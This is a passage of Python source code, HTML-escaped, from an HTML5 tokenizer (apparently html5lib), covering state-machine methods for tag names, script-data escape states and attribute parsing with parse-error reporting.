            self.state = self.tagNameState
        elif data == &quot;&gt;&quot;:
            # XXX In theory it could be something besides a tag name. But
            # do we really care?
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-tag-name-but-got-right-bracket&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&gt;&quot;})
            self.state = self.dataState
        elif data == &quot;?&quot;:
            # XXX In theory it could be something besides a tag name. But
            # do we really care?
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-tag-name-but-got-question-mark&quot;})
            self.stream.unget(data)
            self.state = self.bogusCommentState
        else:
            # XXX
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-tag-name&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.stream.unget(data)
            self.state = self.dataState
        return True

    def closeTagOpenState(self):
        data = self.stream.char()
        if data in asciiLetters:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;], &quot;name&quot;: data,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.tagNameState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-closing-tag-but-got-right-bracket&quot;})
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-closing-tag-but-got-eof&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;/&quot;})
            self.state = self.dataState
        else:
            # XXX data can be _&#039;_...
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-closing-tag-but-got-char&quot;,
                                    &quot;datavars&quot;: {&quot;data&quot;: data}})
            self.stream.unget(data)
            self.state = self.bogusCommentState
        return True

    def tagNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeAttributeNameState
        elif data == &quot;&gt;&quot;:
            self.emitCurrentToken()
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-tag-name&quot;})
            self.state = self.dataState
        elif data == &quot;/&quot;:
            self.state = self.selfClosingStartTagState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;name&quot;] += &quot;\uFFFD&quot;
        else:
            self.currentToken[&quot;name&quot;] += data
            # (Don&#039;t use charsUntil here, because tag names are
            # very short and it&#039;s faster to not do anything fancy)
        return True

    def rcdataLessThanSignState(self):
        data = self.stream.char()
        if data == &quot;/&quot;:
            self.temporaryBuffer = &quot;&quot;
            self.state = self.rcdataEndTagOpenState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.stream.unget(data)
            self.state = self.rcdataState
        return True

    def rcdataEndTagOpenState(self):
        data = self.stream.char()
        if data in asciiLetters:
            self.temporaryBuffer += data
            self.state = self.rcdataEndTagNameState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;/&quot;})
            self.stream.unget(data)
            self.state = self.rcdataState
        return True

    def rcdataEndTagNameState(self):
        appropriate = self.currentToken and self.currentToken[&quot;name&quot;].lower() == self.temporaryBuffer.lower()
        data = self.stream.char()
        if data in spaceCharacters and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.beforeAttributeNameState
        elif data == &quot;/&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.selfClosingStartTagState
        elif data == &quot;&gt;&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.emitCurrentToken()
            self.state = self.dataState
        elif data in asciiLetters:
            self.temporaryBuffer += data
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;&lt;/&quot; + self.temporaryBuffer})
            self.stream.unget(data)
            self.state = self.rcdataState
        return True

    def rawtextLessThanSignState(self):
        data = self.stream.char()
        if data == &quot;/&quot;:
            self.temporaryBuffer = &quot;&quot;
            self.state = self.rawtextEndTagOpenState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.stream.unget(data)
            self.state = self.rawtextState
        return True

    def rawtextEndTagOpenState(self):
        data = self.stream.char()
        if data in asciiLetters:
            self.temporaryBuffer += data
            self.state = self.rawtextEndTagNameState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;/&quot;})
            self.stream.unget(data)
            self.state = self.rawtextState
        return True

    def rawtextEndTagNameState(self):
        appropriate = self.currentToken and self.currentToken[&quot;name&quot;].lower() == self.temporaryBuffer.lower()
        data = self.stream.char()
        if data in spaceCharacters and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.beforeAttributeNameState
        elif data == &quot;/&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.selfClosingStartTagState
        elif data == &quot;&gt;&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.emitCurrentToken()
            self.state = self.dataState
        elif data in asciiLetters:
            self.temporaryBuffer += data
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;&lt;/&quot; + self.temporaryBuffer})
            self.stream.unget(data)
            self.state = self.rawtextState
        return True

    def scriptDataLessThanSignState(self):
        data = self.stream.char()
        if data == &quot;/&quot;:
            self.temporaryBuffer = &quot;&quot;
            self.state = self.scriptDataEndTagOpenState
        elif data == &quot;!&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;!&quot;})
            self.state = self.scriptDataEscapeStartState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.stream.unget(data)
            self.state = self.scriptDataState
        return True

    def scriptDataEndTagOpenState(self):
        data = self.stream.char()
        if data in asciiLetters:
            self.temporaryBuffer += data
            self.state = self.scriptDataEndTagNameState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;/&quot;})
            self.stream.unget(data)
            self.state = self.scriptDataState
        return True

    def scriptDataEndTagNameState(self):
        appropriate = self.currentToken and self.currentToken[&quot;name&quot;].lower() == self.temporaryBuffer.lower()
        data = self.stream.char()
        if data in spaceCharacters and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.beforeAttributeNameState
        elif data == &quot;/&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.selfClosingStartTagState
        elif data == &quot;&gt;&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.emitCurrentToken()
            self.state = self.dataState
        elif data in asciiLetters:
            self.temporaryBuffer += data
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;&lt;/&quot; + self.temporaryBuffer})
            self.stream.unget(data)
            self.state = self.scriptDataState
        return True

    def scriptDataEscapeStartState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataEscapeStartDashState
        else:
            self.stream.unget(data)
            self.state = self.scriptDataState
        return True

    def scriptDataEscapeStartDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataEscapedDashDashState
        else:
            self.stream.unget(data)
            self.state = self.scriptDataState
        return True

    def scriptDataEscapedState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataEscapedDashState
        elif data == &quot;&lt;&quot;:
            self.state = self.scriptDataEscapedLessThanSignState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
        elif data == EOF:
            self.state = self.dataState
        else:
            chars = self.stream.charsUntil((&quot;&lt;&quot;, &quot;-&quot;, &quot;\u0000&quot;))
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;:
                                    data + chars})
        return True

    def scriptDataEscapedDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataEscapedDashDashState
        elif data == &quot;&lt;&quot;:
            self.state = self.scriptDataEscapedLessThanSignState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
            self.state = self.scriptDataEscapedState
        elif data == EOF:
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataEscapedDashDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
        elif data == &quot;&lt;&quot;:
            self.state = self.scriptDataEscapedLessThanSignState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&gt;&quot;})
            self.state = self.scriptDataState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
            self.state = self.scriptDataEscapedState
        elif data == EOF:
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataEscapedLessThanSignState(self):
        data = self.stream.char()
        if data == &quot;/&quot;:
            self.temporaryBuffer = &quot;&quot;
            self.state = self.scriptDataEscapedEndTagOpenState
        elif data in asciiLetters:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot; + data})
            self.temporaryBuffer = data
            self.state = self.scriptDataDoubleEscapeStartState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.stream.unget(data)
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataEscapedEndTagOpenState(self):
        data = self.stream.char()
        if data in asciiLetters:
            self.temporaryBuffer = data
            self.state = self.scriptDataEscapedEndTagNameState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;/&quot;})
            self.stream.unget(data)
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataEscapedEndTagNameState(self):
        appropriate = self.currentToken and self.currentToken[&quot;name&quot;].lower() == self.temporaryBuffer.lower()
        data = self.stream.char()
        if data in spaceCharacters and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.beforeAttributeNameState
        elif data == &quot;/&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.selfClosingStartTagState
        elif data == &quot;&gt;&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.emitCurrentToken()
            self.state = self.dataState
        elif data in asciiLetters:
            self.temporaryBuffer += data
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;&lt;/&quot; + self.temporaryBuffer})
            self.stream.unget(data)
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataDoubleEscapeStartState(self):
        data = self.stream.char()
        if data in (spaceCharacters | frozenset((&quot;/&quot;, &quot;&gt;&quot;))):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            if self.temporaryBuffer.lower() == &quot;script&quot;:
                self.state = self.scriptDataDoubleEscapedState
            else:
                self.state = self.scriptDataEscapedState
        elif data in asciiLetters:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.temporaryBuffer += data
        else:
            self.stream.unget(data)
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataDoubleEscapedState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataDoubleEscapedDashState
        elif data == &quot;&lt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.state = self.scriptDataDoubleEscapedLessThanSignState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
        elif data == EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-script-in-script&quot;})
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
        return True

    def scriptDataDoubleEscapedDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataDoubleEscapedDashDashState
        elif data == &quot;&lt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.state = self.scriptDataDoubleEscapedLessThanSignState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
            self.state = self.scriptDataDoubleEscapedState
        elif data == EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-script-in-script&quot;})
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.state = self.scriptDataDoubleEscapedState
        return True

    def scriptDataDoubleEscapedDashDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
        elif data == &quot;&lt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.state = self.scriptDataDoubleEscapedLessThanSignState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&gt;&quot;})
            self.state = self.scriptDataState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
            self.state = self.scriptDataDoubleEscapedState
        elif data == EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-script-in-script&quot;})
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.state = self.scriptDataDoubleEscapedState
        return True

    def scriptDataDoubleEscapedLessThanSignState(self):
        data = self.stream.char()
        if data == &quot;/&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;/&quot;})
            self.temporaryBuffer = &quot;&quot;
            self.state = self.scriptDataDoubleEscapeEndState
        else:
            self.stream.unget(data)
            self.state = self.scriptDataDoubleEscapedState
        return True

    def scriptDataDoubleEscapeEndState(self):
        data = self.stream.char()
        if data in (spaceCharacters | frozenset((&quot;/&quot;, &quot;&gt;&quot;))):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            if self.temporaryBuffer.lower() == &quot;script&quot;:
                self.state = self.scriptDataEscapedState
            else:
                self.state = self.scriptDataDoubleEscapedState
        elif data in asciiLetters:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.temporaryBuffer += data
        else:
            self.stream.unget(data)
            self.state = self.scriptDataDoubleEscapedState
        return True

    def beforeAttributeNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.stream.charsUntil(spaceCharacters, True)
        elif data in asciiLetters:
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        elif data == &quot;&gt;&quot;:
            self.emitCurrentToken()
        elif data == &quot;/&quot;:
            self.state = self.selfClosingStartTagState
        elif data in (&quot;&#039;&quot;, &#039;&quot;&#039;, &quot;=&quot;, &quot;&lt;&quot;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;invalid-character-in-attribute-name&quot;})
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;].append([&quot;\uFFFD&quot;, &quot;&quot;])
            self.state = self.attributeNameState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-attribute-name-but-got-eof&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        return True

    def attributeNameState(self):
        data = self.stream.char()
        leavingThisState = True
        emitToken = False
        if data == &quot;=&quot;:
            self.state = self.beforeAttributeValueState
        elif data in asciiLetters:
            self.currentToken[&quot;data&quot;][-1][0] += data +\
                self.stream.charsUntil(asciiLetters, True)
            leavingThisState = False
        elif data == &quot;&gt;&quot;:
            # XXX If we emit here the attributes are converted to a dict
            # without being checked and when the code below runs we error
            # because data is a dict not a list
            emitToken = True
        elif data in spaceCharacters:
            self.state = self.afterAttributeNameState
        elif data == &quot;/&quot;:
            self.state = self.selfClosingStartTagState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;][-1][0] += &quot;\uFFFD&quot;
            leavingThisState = False
        elif data in (&quot;&#039;&quot;, &#039;&quot;&#039;, &quot;&lt;&quot;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;:
                                    &quot;invalid-character-in-attribute-name&quot;})
            self.currentToken[&quot;data&quot;][-1][0] += data
            leavingThisState = False
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;eof-in-attribute-name&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;][-1][0] += data
            leavingThisState = False

        if leavingThisState:
            # Attributes are not dropped at this stage. That happens when the
            # start tag token is emitted so values can still be safely appended
            # to attributes, but we do want to report the parse error in time.
            self.currentToken[&quot;data&quot;][-1][0] = (
                self.currentToken[&quot;data&quot;][-1][0].translate(asciiUpper2Lower))
            for name, _ in self.currentToken[&quot;data&quot;][:-1]:
                if self.currentToken[&quot;data&quot;][-1][0] == name:
                    self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                            &quot;duplicate-attribute&quot;})
                    break
            # XXX Fix for above XXX
            if emitToken:
                self.emitCurrentToken()
        return True

    def afterAttributeNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.stream.charsUntil(spaceCharacters, True)
        elif data == &quot;=&quot;:
            self.state = self.beforeAttributeValueState
        elif data == &quot;&gt;&quot;:
            self.emitCurrentToken()
        elif data in asciiLetters:
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        elif data == &quot;/&quot;:
            self.state = self.selfClosingStartTagState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;].append([&quot;\uFFFD&quot;, &quot;&quot;])
            self.state = self.attributeNameState
        elif data in (&quot;&#039;&quot;, &#039;&quot;&#039;, &quot;&lt;&quot;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;invalid-character-after-attribute-name&quot;})
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-end-of-tag-but-got-eof&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        return True

    def beforeAttributeValueState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.stream.charsUntil(spaceCharacters, True)
        elif data == &quot;\&quot;&quot;:
            self.state = self.attributeValueDoubleQuotedState
        elif data == &quot;&amp;&quot;:
            self.state = self.attributeValueUnQuotedState
            self.stream.unget(data)
        elif data == &quot;&#039;&quot;:
            self.state = self.attributeValueSingleQuotedState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-attribute-value-but-got-right-bracket&quot;})
            self.emitCurrentToken()
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += &quot;\uFFFD&quot;
            self.state = self.attributeValueUnQuotedState
        elif data in (&quot;=&quot;, &quot;&lt;&quot;, &quot;`&quot;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;equals-in-unquoted-attribute-value&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += data
            self.state = self.attributeValueUnQuotedState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-attribute-value-but-got-eof&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;][-1][1] += data
            self.state = self.attributeValueUnQuotedState
        return True

    def attributeValueDoubleQuotedState(self):
        data = self.stream.char()
        if data == &quot;\&quot;&quot;:
            self.state = self.afterAttributeValueState
        elif data == &quot;&amp;&quot;:
            self.processEntityInAttribute(&#039;&quot;&#039;)
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += &quot;\uFFFD&quot;
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-attribute-value-double-quote&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;][-1][1] += data +\
                self.stream.charsUntil((&quot;\&quot;&quot;, &quot;&amp;&quot;, &quot;\u0000&quot;))
        return True

    def attributeValueSingleQuotedState(self):
        data = self.stream.char()
        if data == &quot;&#039;&quot;:
            self.state = self.afterAttributeValueState
        elif data == &quot;&amp;&quot;:
            self.processEntityInAttribute(&quot;&#039;&quot;)
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += &quot;\uFFFD&quot;
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-attribute-value-single-quote&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;][-1][1] += data +\
                self.stream.charsUntil((&quot;&#039;&quot;, &quot;&amp;&quot;, &quot;\u0000&quot;))
        return True

    def attributeValueUnQuotedState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeAttributeNameState
        elif data == &quot;&amp;&quot;:
            self.processEntityInAttribute(&quot;&gt;&quot;)
        elif data == &quot;&gt;&quot;:
            self.emitCurrentToken()
        elif data in (&#039;&quot;&#039;, &quot;&#039;&quot;, &quot;=&quot;, &quot;&lt;&quot;, &quot;`&quot;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-character-in-unquoted-attribute-value&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += data
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += &quot;\uFFFD&quot;
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-attribute-value-no-quotes&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;][-1][1] += data + self.stream.charsUntil(
